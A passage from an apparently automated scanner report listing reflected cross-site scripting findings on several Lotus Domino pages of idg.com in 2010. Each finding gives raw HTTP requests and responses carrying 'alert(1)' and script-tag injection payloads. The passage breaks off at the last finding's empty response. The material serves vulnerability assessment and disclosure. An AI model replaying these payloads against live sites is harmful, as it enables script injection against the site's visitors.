This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/idgproducts.nsf/countries5d857"%3b7485e1d876f HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:08 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5017 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/countries5d857";7485e1d876f"); } catch(err) {}</script> ...[SNIP]...
2.238. http://idg.com/www/idgproducts.nsf/countries [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/idgproducts.nsf/countries
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d3b0"-alert(1)-"3350bf4334c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/idgproducts.nsf/countries?3d3b0"-alert(1)-"3350bf4334c=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:08 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5030 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/countries?3d3b0"-alert(1)-"3350bf4334c=1"); } catch(err) {}</script> ...[SNIP]...
The value of the openview request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4603a"-alert(1)-"811e7d0ebea was submitted in the openview parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/idgproducts.nsf/countries?openview4603a"-alert(1)-"811e7d0ebea HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:09 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5036 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/countries?openview4603a"-alert(1)-"811e7d0ebea"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9721d"%3b2db346ab689 was submitted in the REST URL parameter 1. This input was echoed as 9721d";2db346ab689 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www9721d"%3b2db346ab689/idgproducts.nsf/productfinder HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:56 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5021 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www9721d";2db346ab689/idgproducts.nsf/productfinder"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75d4b"%3b50ad274776d was submitted in the REST URL parameter 3. This input was echoed as 75d4b";50ad274776d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/idgproducts.nsf/productfinder75d4b"%3b50ad274776d HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:57 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5021 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/productfinder75d4b";50ad274776d"); } catch(err) {}</script> ...[SNIP]...
2.242. http://idg.com/www/idgproducts.nsf/productfinder [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/idgproducts.nsf/productfinder
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de78f"-alert(1)-"626e657ea96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/idgproducts.nsf/productfinder?de78f"-alert(1)-"626e657ea96=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:56 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5034 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/productfinder?de78f"-alert(1)-"626e657ea96=1"); } catch(err) {}</script> ...[SNIP]...
The value of the readform request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 977b5"-alert(1)-"03a962af87d was submitted in the readform parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/idgproducts.nsf/productfinder?readform977b5"-alert(1)-"03a962af87d HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:59 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5040 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/productfinder?readform977b5"-alert(1)-"03a962af87d"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b36f5"%3b3f4328df7 was submitted in the REST URL parameter 1. This input was echoed as b36f5";3f4328df7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwb36f5"%3b3f4328df7/idgproducts.nsf/typeform HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:58 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5014 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwb36f5";3f4328df7/idgproducts.nsf/typeform"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e35de"%3b134e9857aa3 was submitted in the REST URL parameter 3. This input was echoed as e35de";134e9857aa3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/idgproducts.nsf/typeforme35de"%3b134e9857aa3 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:59 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5016 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/typeforme35de";134e9857aa3"); } catch(err) {}</script> ...[SNIP]...
2.246. http://idg.com/www/idgproducts.nsf/typeform [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/idgproducts.nsf/typeform
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1831"-alert(1)-"b301e0f9a7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/idgproducts.nsf/typeform?a1831"-alert(1)-"b301e0f9a7f=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:58 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5029 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/typeform?a1831"-alert(1)-"b301e0f9a7f=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f478e"%3b38f4571d878 was submitted in the REST URL parameter 1. This input was echoed as f478e";38f4571d878 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwf478e"%3b38f4571d878/media.nsf/MRBydate HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:09 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5010 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwf478e";38f4571d878/media.nsf/MRBydate"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98f73"%3b4cbc64418be was submitted in the REST URL parameter 3. This input was echoed as 98f73";4cbc64418be in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/media.nsf/MRBydate98f73"%3b4cbc64418be HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:09 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5010 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/media.nsf/MRBydate98f73";4cbc64418be"); } catch(err) {}</script> ...[SNIP]...
2.249. http://idg.com/www/media.nsf/MRBydate [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/media.nsf/MRBydate
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdc88"-alert(1)-"d900323b254 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/media.nsf/MRBydate?fdc88"-alert(1)-"d900323b254=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:08 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5023 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/media.nsf/MRBydate?fdc88"-alert(1)-"d900323b254=1"); } catch(err) {}</script> ...[SNIP]...
The value of the readform request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7113"-alert(1)-"051b7f0b7c4 was submitted in the readform parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/media.nsf/MRBydate?readforma7113"-alert(1)-"051b7f0b7c4 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:16 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5029 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/media.nsf/MRBydate?readforma7113"-alert(1)-"051b7f0b7c4"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860ea"%3b94e098012aa was submitted in the REST URL parameter 1. This input was echoed as 860ea";94e098012aa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www860ea"%3b94e098012aa/pr.nsf/PressHome HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:00 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5008 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www860ea";94e098012aa/pr.nsf/PressHome"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec156"%3b6164df56710 was submitted in the REST URL parameter 3. This input was echoed as ec156";6164df56710 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/pr.nsf/PressHomeec156"%3b6164df56710 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:06 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5008 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/PressHomeec156";6164df56710"); } catch(err) {}</script> ...[SNIP]...
The value of the ReadForm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a6b2"-alert(1)-"28eeed432fc was submitted in the ReadForm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/pr.nsf/PressHome?ReadForm3a6b2"-alert(1)-"28eeed432fc HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:19 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5027 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/PressHome?ReadForm3a6b2"-alert(1)-"28eeed432fc"); } catch(err) {}</script> ...[SNIP]...
2.254. http://idg.com/www/pr.nsf/PressHome [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/pr.nsf/PressHome
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9be16"><script>alert(1)</script>657b62b0feb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www/pr.nsf/PressHome?ReadForm&9be16"><script>alert(1)</script>657b62b0feb=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
